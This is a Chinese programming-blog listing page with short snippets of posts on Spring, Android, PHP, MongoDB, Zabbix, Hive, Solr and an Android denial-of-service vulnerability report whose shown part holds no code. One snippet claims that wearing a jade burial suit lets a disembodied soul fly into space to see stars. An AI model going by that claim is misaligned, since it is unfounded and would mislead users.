    用注解来向Spring容器注册Bean。   需要在applicationContext.xml中注册: <context:component-scan base-package=”pagkage1[,pagkage2,…,pagkageN]”/>。 如:在base-package指明一个包    <context:component-sc
  • 传感器 百合不是茶 android传感器
    android传感器的作用主要就是来获取数据,根据得到的数据来触发某种事件   下面就以重力传感器为例;   1,在onCreate中获得传感器服务   private SensorManager sm;// 获得系统的服务 private Sensor sensor;// 创建传感器实例 @Override protected void
  • [光磁与探测]金吕玉衣的意义 comsci
          这是一个古代人的秘密:现在告诉大家       信不信由你们:       穿上金律玉衣的人,如果处于灵魂出窍的状态,可以飞到宇宙中去看星星       这就是为什么古代
  • 精简的反序打印某个数 沐刃青蛟 打印
    以前看到一些让求反序打印某个数的程序。 比如:输入123,输出321。   记得以前是告诉你是几位数的,当时就抓耳挠腮,完全没有思路。   似乎最后是用到%和/方法解决的。   而今突然想到一个简短的方法,就可以实现任意位数的反序打印(但是如果是首位数或者尾位数为0时就没有打印出来了)   代码如下: long num, num1=0;
  • PHP:6种方法获取文件的扩展名 IT独行者 PHP扩展名
      PHP:6种方法获取文件的扩展名   1、字符串查找和截取的方法   1 $extension = substr ( strrchr ( $file ,  '.' ), 1); 2、字符串查找和截取的方法二   1 $extension = substr
  • 面试111 文强chu 面试
    1事务隔离级别有那些 ,事务特性是什么(问到一次) 2 spring aop 如何管理事务的,如何实现的。动态代理如何实现,jdk怎么实现动态代理的,ioc是怎么实现的,spring是单例还是多例,有那些初始化bean的方式,各有什么区别(经常问) 3 struts默认提供了那些拦截器 (一次) 4 过滤器和拦截器的区别 (频率也挺高) 5 final,finally final
  • XML的四种解析方式 小桔子 domjdomdom4jsax
    在平时工作中,难免会遇到把 XML 作为数据存储格式。面对目前种类繁多的解决方案,哪个最适合我们呢?在这篇文章中,我对这四种主流方案做一个不完全评测,仅仅针对遍历 XML 这块来测试,因为遍历 XML 是工作中使用最多的(至少我认为)。   预 备   测试环境:   AMD 毒龙1.4G OC 1.5G、256M DDR333、Windows2000 Server
  • wordpress中常见的操作 aichenglong 中文注册wordpress移除菜单
    1 wordpress中使用中文名注册解决办法   1)使用插件   2)修改wp源代码      进入到wp-include/formatting.php文件中找到       function sanitize_user( $username, $strict = false
  • 小飞飞学管理-1 alafqq 管理
    项目管理的下午题,其实就在提出问题(挑刺),分析问题,解决问题。 今天我随意看下10年上半年的第一题。主要就是项目经理的提拨和培养。 结合我自己经历写下心得 对于公司选拔和培养项目经理的制度有什么毛病呢? 1,公司考察,选拔项目经理,只关注技术能力,而很少或没有关注管理方面的经验,能力。 2,公司对项目经理缺乏必要的项目管理知识和技能方面的培训。 3,公司对项目经理的工作缺乏进行指
  • IO输入输出部分探讨 百合不是茶 IO
     //文件处理  在处理文件输入输出时要引入java.IO这个包; /* 1,运用File类对文件目录和属性进行操作 2,理解流,理解输入输出流的概念 3,使用字节/符流对文件进行读/写操作 4,了解标准的I/O 5,了解对象序列化 */   //1,运用File类对文件目录和属性进行操作   //在工程中线创建一个text.txt
  • getElementById的用法 bijian1013 element
            getElementById是通过Id来设置/返回HTML标签的属性及调用其事件与方法。用这个方法基本上可以控制页面所有标签,条件很简单,就是给每个标签分配一个ID号。        返回具有指定ID属性值的第一个对象的一个引用。        语法: &n
  • 励志经典语录 bijian1013 励志人生
    经典语录1:   哈佛有一个著名的理论:人的差别在于业余时间,而一个人的命运决定于晚上8点到10点之间。每晚抽出2个小时的时间用来阅读、进修、思考或参加有意的演讲、讨论,你会发现,你的人生正在发生改变,坚持数年之后,成功会向你招手。不要每天抱着QQ/MSN/游戏/电影/肥皂剧……奋斗到12点都舍不得休息,看就看一些励志的影视或者文章,不要当作消遣;学会思考人生,学会感悟人生
  • [MongoDB学习笔记三]MongoDB分片 bit1129 mongodb
    MongoDB的副本集(Replica Set)一方面解决了数据的备份和数据的可靠性问题,另一方面也提升了数据的读写性能。MongoDB分片(Sharding)则解决了数据的扩容问题,MongoDB作为云计算时代的分布式数据库,大容量数据存储,高效并发的数据存取,自动容错等是MongoDB的关键指标。 本篇介绍MongoDB的切片(Sharding)   1.何时需要分片 &nbs
  • 【Spark八十三】BlockManager在Spark中的使用场景 bit1129 manager
    1. Broadcast变量的存储,在HttpBroadcast类中可以知道 2. RDD通过CacheManager存储RDD中的数据,CacheManager也是通过BlockManager进行存储的 3. ShuffleMapTask得到的结果数据,是通过FileShuffleBlockManager进行管理的,而FileShuffleBlockManager最终也是使用BlockMan
  • yum方式部署zabbix ronin47 yum方式部署zabbix
    安装网络yum库#rpm -ivh http://repo.zabbix.com/zabbix/2.4/rhel/6/x86_64/zabbix-release-2.4-1.el6.noarch.rpm 通过yum装mysql和zabbix调用的插件还有agent代理#yum install zabbix-server-mysql zabbix-web-mysql mysql-
  • Hibernate4和MySQL5.5自动创建表失败问题解决方法 byalias J2EEHibernate4
    今天初学Hibernate4,了解了使用Hibernate的过程。大体分为4个步骤: ①创建hibernate.cfg.xml文件 ②创建持久化对象 ③创建*.hbm.xml映射文件 ④编写hibernate相应代码 在第四步中,进行了单元测试,测试预期结果是hibernate自动帮助在数据库中创建数据表,结果JUnit单元测试没有问题,在控制台打印了创建数据表的SQL语句,但在数据库中
  • Netty源码学习-FrameDecoder bylijinnan javanetty
    Netty 3.x的user guide里FrameDecoder的例子,有几个疑问: 1.文档说:FrameDecoder calls decode method with an internally maintained cumulative buffer whenever new data is received. 为什么每次有新数据到达时,都会调用decode方法? 2.Dec
  • SQL行列转换方法 chicony 行列转换
    create table tb(终端名称 varchar(10) , CEI分值 varchar(10) , 终端数量 int) insert into tb values('三星' , '0-5' , 74) insert into tb values('三星' , '10-15' , 83) insert into tb values('苹果' , '0-5' , 93)
  • 中文编码测试 ctrain 编码
    循环打印转换编码 String[] codes = { "iso-8859-1", "utf-8", "gbk", "unicode" }; for (int i = 0; i < codes.length; i++) { for (int j
  • hive 客户端查询报堆内存溢出解决方法 daizj hive堆内存溢出
    hive> select * from t_test where ds=20150323 limit 2; OK Exception in thread "main" java.lang.OutOfMemoryError: Java heap space   问题原因: hive堆内存默认为256M   这个问题的解决方法为: 修改/us
  • 人有多大懒,才有多大闲 (评论『卓有成效的程序员』) dcj3sjt126com 程序员
      卓有成效的程序员给我的震撼很大,程序员作为特殊的群体,有的人可以这么懒,  懒到事情都交给机器去做 ,而有的人又可以那么勤奋,每天都孜孜不倦得做着重复单调的工作。   在看这本书之前,我属于勤奋的人,而看完这本书以后,我要努力变成懒惰的人。 不要在去庞大的开始菜单里面一项一项搜索自己的应用程序,也不要在自己的桌面上放置眼花缭乱的快捷图标
  • Eclipse简单有用的配置 dcj3sjt126com eclipse
    1、显示行号  Window -- Prefences -- General -- Editors -- Text Editors -- show line numbers   2、代码提示字符 Window ->Perferences,并依次展开 Java -> Editor -> Content Assist,最下面一栏 auto-Activation
  • 在tomcat上面安装solr4.8.0全过程 eksliang Solrsolr4.0后的版本安装solr4.8.0安装
    转载请出自出处: http://eksliang.iteye.com/blog/2096478       首先solr是一个基于java的web的应用,所以安装solr之前必须先安装JDK和tomcat,我这里就先省略安装tomcat和jdk了         第一步:当然是下载去官网上下载最新的solr版本,下载地址
  • Android APP通用型拒绝服务、漏洞分析报告 gg163 漏洞androidAPP分析
    点评:记得曾经有段时间很多SRC平台被刷了大量APP本地拒绝服务漏洞,移动安全团队爱内测(ineice.com)发现了一个安卓客户端的通用型拒绝服务漏洞,来看看他们的详细分析吧。  0xr0ot和Xbalien交流所有可能导致应用拒绝服务的异常类型时,发现了一处通用的本地拒绝服务漏洞。该通用型本地拒绝服务可以造成大面积的app拒绝服务。  针对序列化对象而出现的拒绝服务主要
  • HoverTree项目已经实现分层 hvt 编程.netWebC#ASP.ENT
    HoverTree项目已经初步实现分层,源代码已经上传到 http://hovertree.codeplex.com请到SOURCE CODE查看。在本地用SQL Server 2008 数据库测试成功。数据库和表请参考:http://keleyi.com/a/bjae/ue6stb42.htmHoverTree是一个ASP.NET 开源项目,希望对你学习ASP.NET或者C#语言有帮助,如果你对
  • Google Maps API v3: Remove Markers 移除标记 天梯梦 google maps api
    Simply do the following:   I. Declare a global variable: var markersArray = [];   II. Define a function: function clearOverlays() { for (var i = 0; i < markersArray.length; i++ )
  • jQuery选择器总结 lq38366 jquery选择器
      1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
  • 基础数据结构和算法六:Quick sort sunwinner AlgorithmQuicksort
    Quick sort is probably used more widely than any other. It is popular because it is not difficult to implement, works well for a variety of different kinds of input data, and is substantially faster t
  • 如何让Flash不遮挡HTML div元素的技巧_HTML/Xhtml_网页制作 刘星宇 htmlWeb
    今天在写一个flash广告代码的时候,因为flash自带的链接,容易被当成弹出广告,所以做了一个div层放到flash上面,这样链接都是a触发的不会被拦截,但发现flash一直处于div层上面,原来flash需要加个参数才可以。 让flash置于DIV层之下的方法,让flash不挡住飘浮层或下拉菜单,让Flash不档住浮动对象或层的关键参数:wmode=opaque。 方法如下:
  • Mybatis实用Mapper SQL汇总示例 wdmcygah sqlmysqlmybatis实用
    Mybatis作为一个非常好用的持久层框架,相关资料真的是少得可怜,所幸的是官方文档还算详细。本博文主要列举一些个人感觉比较常用的场景及相应的Mapper SQL写法,希望能够对大家有所帮助。 不少持久层框架对动态SQL的支持不足,在SQL需要动态拼接时非常苦恼,而Mybatis很好地解决了这个问题,算是框架的一大亮点。对于常见的场景,例如:批量插入/更新/删除,模糊查询,多条件查询,联表查询,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他